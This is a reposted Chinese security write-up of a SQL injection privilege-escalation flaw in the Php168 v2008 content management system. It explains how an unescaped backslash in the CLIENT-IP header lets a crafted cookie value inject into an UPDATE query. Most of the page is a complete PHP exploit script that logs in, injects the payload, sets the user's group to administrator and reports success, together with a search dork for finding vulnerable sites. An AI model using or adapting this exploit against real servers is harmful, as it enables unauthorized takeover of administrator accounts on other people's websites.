Php168 v2008 权限提升漏洞 's

admin
admin
admin
102755
文章
87
评论
2017年5月5日21:50:59评论336 views字数 3945阅读13分9秒阅读模式
摘要

by Ryat
http://www.wolvez.org
2009-01-25简单分析下这个漏洞 看一下filtrate函数是怎么处理的

by Ryat
http://www.wolvez.org
2009-01-25

简单分析下这个漏洞

common.inc.php  if($_SERVER['HTTP_CLIENT_IP']){      $onlineip=$_SERVER['HTTP_CLIENT_IP']; }elseif($_SERVER['HTTP_X_FORWARDED_FOR']){      $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else{      $onlineip=$_SERVER['REMOTE_ADDR']; } $onlineip = preg_replace("/^([/d/.]+).*/", "//1", filtrate($onlineip)); //这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip

看一下filtrate函数是怎么处理的

function.inc.php  function filtrate($msg){     $msg = str_replace('&amp;','&',$msg);     $msg = str_replace('&nbsp;',' ',$msg);     $msg = str_replace('"','&quot;',$msg);     $msg = str_replace("'",'&#39;',$msg);     $msg = str_replace("<","&lt;",$msg);     $msg = str_replace(">","&gt;",$msg);     $msg = str_replace("/t","   &nbsp;  &nbsp;",$msg);     $msg = str_replace("/r","",$msg);     $msg = str_replace("   "," &nbsp; ",$msg);     return $msg; }

过滤了'”<等,但是没有处理/

common.inc.php      if($usr_oltime>30||!$usr_oltime){         $usr_oltime>600 && $usr_oltime=600;         include(PHP168_PATH."php168/level.php");         if( isset($memberlevel[$lfjdb[groupid]]) ){             $SQL=",groupid=8";             $lfjdb[money]=get_money($lfjuid);             foreach( $memberlevel AS $key=>$value){                 if($lfjdb[money]>=$value){                     $SQL=",groupid=$key";                 }             }         }else{             $SQL="";         }         $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'"); //因为这个地方是拼接字符串的形式,所以可以使用/来转义',然后利用$usr_oltime来注射:)

另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:

UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[/]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'

最后给个EXP:

#!/usr/bin/php <?php  print_r(' +---------------------------------------------------------------------------+ Php168 <= v2008 update user access exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PHP168" +---------------------------------------------------------------------------+ '); /**  * works regardless of php.ini settings  */ if ($argc < 5) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user pass host:      target server (ip/hostname) path:      path to php168 user:      login username pass:      login password Example: php '.$argv[0].' localhost /php168/ +---------------------------------------------------------------------------+ ');     exit; }  error_reporting(7); ini_set('max_execution_time', 0);  $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4];  $resp = send(); preg_match('/Set-Cookie:/s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);  if ($cookie)     if (strpos(send(), 'puret_t') !== false)         exit("Expoilt Success!/nYou Are Admin Now!/n");     else         exit("Exploit Failed!/n"); else     exit("Exploit Failed!/n");  function rands($length = 8) {     $hash = '';     $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';     $max = strlen($chars) - 1;     mt_srand((double)microtime() * 1000000);     for ($i = 0; $i < $length; $i++)         $hash .= $chars[mt_rand(0, $max)];      return $hash; }  function send() {     global $host, $path, $user, $pass, $cookie;      if ($cookie) {         $cookie[1] .= ';USR='.rands()."/t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#/t/t";         $cmd = '';          $message = "POST ".$path."member/userinfo.php  HTTP/1.1/r/n";         $message .= "Accept: */*/r/n";         $message .= "Accept-Language: zh-cn/r/n";         $message .= "Content-Type: application/x-www-form-urlencoded/r/n";         $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";         $message .= "CLIENT-IP: ryat///r/n";         $message .= "Host: $host/r/n";         $message .= "Content-Length: ".strlen($cmd)."/r/n";         $message .= "Connection: Close/r/n";         $message .= "Cookie: ".$cookie[1]."/r/n/r/n";         $message .= $cmd;     } else {         $cmd = "username=$user&password=$pass&step=2";          $message = "POST ".$path."login.php  HTTP/1.1/r/n";         $message .= "Accept: */*/r/n";         $message .= "Accept-Language: zh-cn/r/n";         $message .= "Content-Type: application/x-www-form-urlencoded/r/n";         $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";         $message .= "Host: $host/r/n";         $message .= "Content-Length: ".strlen($cmd)."/r/n";         $message .= "Connection: Close/r/n/r/n";         $message .= $cmd;     }      $fp = fsockopen($host, 80);     fputs($fp, $message);      $resp = '';      while ($fp && !feof($fp))         $resp .= fread($fp, 1024);      return $resp; }  ?>

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月5日21:50:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Php168 v2008 权限提升漏洞 'shttp://cn-sec.com/archives/46046.html

发表评论

匿名网友 填写信息